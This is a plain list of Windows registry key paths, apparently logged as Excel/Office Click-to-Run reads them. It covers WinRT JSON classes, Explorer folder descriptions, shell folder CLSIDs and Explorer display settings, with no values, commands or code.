HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Data.Json.JsonValue\DllPath
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Data.Json.JsonValue\Threading
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Data.Json.JsonValue\TrustLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Data.Json.JsonValue\CustomAttributes
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Data.Json.JsonValue\CustomAttributes
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Data.Json.JsonValue\RemoteServer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Data.Json.JsonValue\ActivateAsUser
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Data.Json.JsonValue\ActivateInSharedBroker
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Data.Json.JsonValue\ActivateInBrokerForMediumILContainer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Data.Json.JsonValue\Permissions
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Data.Json.JsonValue\ActivateOnHostFlags
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\TokenBroker\TestHooks
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Data.Json.JsonArray
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Data.Json.JsonArray
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Data.Json.JsonArray\ActivationType
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Data.Json.JsonArray\Server
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Data.Json.JsonArray\DllPath
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Data.Json.JsonArray\Threading
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Data.Json.JsonArray\TrustLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Data.Json.JsonArray\CustomAttributes
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Data.Json.JsonArray\CustomAttributes
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Data.Json.JsonArray\RemoteServer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Data.Json.JsonArray\ActivateAsUser
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Data.Json.JsonArray\ActivateInSharedBroker
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Data.Json.JsonArray\ActivateInBrokerForMediumILContainer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Data.Json.JsonArray\Permissions
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Data.Json.JsonArray\ActivateOnHostFlags
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\UseSentinelFile
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\DisabledItems
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\ShellCompatibility\Applications\EXCEL.EXE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Applications\EXCEL.EXE
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\ShellCompatibility\Applications\EXCEL.EXE\RequiredFile
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\ShellCompatibility\Applications\EXCEL.EXE\Version
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Desktop\Namespace\(Default)
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Desktop\Namespace\ValidateRegItems
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\ValidateRegItems
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Desktop\Namespace\MonitorRegistry
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\MonitorRegistry
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Category
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Name
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\ParentFolder
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Description
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\RelativePath
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\ParsingName
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\InfoTip
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\LocalizedName
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Icon
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Security
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\StreamResource
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\StreamResourceType
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Roamable
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\PreCreate
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Stream
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\PublishExpandedPath
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\DefinitionFlags
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Attributes
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\FolderTypeID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\PropertyBag
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\PropertyBag
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Desktop
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\SharedPC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SharedPC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SharedPC\SharedPCMode
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\SharedPC
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\(Default)
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HubMode
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HubMode
HKEY_CURRENT_USER\Software\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\FolderValueFlags
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\ValidateRegItems
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\MonitorRegistry
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{c0a8b6a3-0000-0000-0000-300300000000}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{c0a8b6a3-0000-0000-0000-300300000000}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{c0a8b6a3-0000-0000-0000-300300000000}\Generation
HKEY_CURRENT_USER\Software\Classes\Drive\shellex\FolderExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Drive\shellex\FolderExtensions
HKEY_LOCAL_MACHINE\Software\Classes\Drive\shellex\FolderExtensions
HKEY_CURRENT_USER\Software\Classes\Drive\shellex\FolderExtensions\{fbeb8a05-beee-4442-804e-409d6c4515e9}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{c0a8b6a3-0000-0000-0000-100000000000}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Drive\shellex\FolderExtensions\{fbeb8a05-beee-4442-804e-409d6c4515e9}
HKEY_LOCAL_MACHINE\Software\Classes\Drive\shellex\FolderExtensions\{fbeb8a05-beee-4442-804e-409d6c4515e9}
HKEY_LOCAL_MACHINE\Software\Classes\Drive\shellex\FolderExtensions\{fbeb8a05-beee-4442-804e-409d6c4515e9}\DriveMask
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Explorer
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer\UseFindFirstFileEnumeration
HKEY_CURRENT_USER\Software\Classes\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\TreatAs
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\TreatAs
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\(Default)
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InprocServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InprocServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\Elevation
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\Elevation
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\LocalServer
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcHandler32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcHandler
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\AppID
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{88d96a05-f192-11d4-a65f-0040963251e5}
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{88d96a05-f192-11d4-a65f-0040963251e5}\InsecureQI
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\Licensing\Automation
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Licensing\Automation
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Licensing\EmulateOLS
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellState
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowCompColor
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\DontPrettyPath
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowInfoTip
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideIcons
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\MapNetDrvBtn
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\WebView
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Filter
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SeparateProcess
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\NoNetCrawling
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\AutoCheckSelect
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\IconsOnly
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowTypeOverlay
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowStatusBar
HKEY_CURRENT_USER\Software\Classes\Directory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Directory
HKEY_LOCAL_MACHINE\Software\Classes\Directory
HKEY_CURRENT_USER\Software\Classes\Directory\ShellEx\IconHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Directory\ShellEx\IconHandler
HKEY_LOCAL_MACHINE\Software\Classes\Directory\ShellEx\IconHandler
HKEY_CURRENT_USER\Software\Classes\Folder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Folder
HKEY_LOCAL_MACHINE\Software\Classes\Folder
HKEY_CURRENT_USER\Software\Classes\Folder\ShellEx\IconHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Folder\ShellEx\IconHandler
HKEY_LOCAL_MACHINE\Software\Classes\Folder\ShellEx\IconHandler
HKEY_CURRENT_USER\Software\Classes\AllFilesystemObjects
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\AllFilesystemObjects
HKEY_LOCAL_MACHINE\Software\Classes\AllFilesystemObjects
HKEY_CURRENT_USER\Software\Classes\AllFilesystemObjects\ShellEx\IconHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\AllFilesystemObjects\ShellEx\IconHandler
HKEY_LOCAL_MACHINE\Software\Classes\AllFilesystemObjects\ShellEx\IconHandler
HKEY_LOCAL_MACHINE\Software\Classes\Directory\DocObject
HKEY_CURRENT_USER\Software\Classes\Directory\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Directory\DocObject
HKEY_LOCAL_MACHINE\Software\Classes\Folder\DocObject
HKEY_CURRENT_USER\Software\Classes\Folder\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Folder\DocObject
HKEY_LOCAL_MACHINE\Software\Classes\AllFilesystemObjects\DocObject
HKEY_CURRENT_USER\Software\Classes\AllFilesystemObjects\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\AllFilesystemObjects\DocObject
HKEY_LOCAL_MACHINE\Software\Classes\Directory\BrowseInPlace
HKEY_CURRENT_USER\Software\Classes\Directory\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Directory\BrowseInPlace
HKEY_LOCAL_MACHINE\Software\Classes\Folder\BrowseInPlace
HKEY_CURRENT_USER\Software\Classes\Folder\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Folder\BrowseInPlace
HKEY_LOCAL_MACHINE\Software\Classes\AllFilesystemObjects\BrowseInPlace
HKEY_CURRENT_USER\Software\Classes\AllFilesystemObjects\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\AllFilesystemObjects\BrowseInPlace
HKEY_CURRENT_USER\Software\Classes\Directory\Clsid
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Directory\Clsid
HKEY_LOCAL_MACHINE\Software\Classes\Directory\Clsid
HKEY_CURRENT_USER\Software\Classes\Folder\Clsid
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Folder\Clsid
HKEY_LOCAL_MACHINE\Software\Classes\Folder\Clsid
HKEY_CURRENT_USER\Software\Classes\AllFilesystemObjects\Clsid
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\AllFilesystemObjects\Clsid
HKEY_LOCAL_MACHINE\Software\Classes\AllFilesystemObjects\Clsid
HKEY_LOCAL_MACHINE\Software\Classes\Directory\IsShortcut
HKEY_LOCAL_MACHINE\Software\Classes\Folder\IsShortcut
HKEY_LOCAL_MACHINE\Software\Classes\AllFilesystemObjects\IsShortcut
HKEY_LOCAL_MACHINE\Software\Classes\Directory\AlwaysShowExt
HKEY_LOCAL_MACHINE\Software\Classes\Directory\NeverShowExt
HKEY_LOCAL_MACHINE\Software\Classes\Folder\NeverShowExt
HKEY_LOCAL_MACHINE\Software\Classes\AllFilesystemObjects\NeverShowExt
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\Category
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\Name
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\ParentFolder
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\Description
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\RelativePath
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\ParsingName
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\InfoTip
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\LocalizedName
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\Attributes
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Start Menu
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\PreCreate
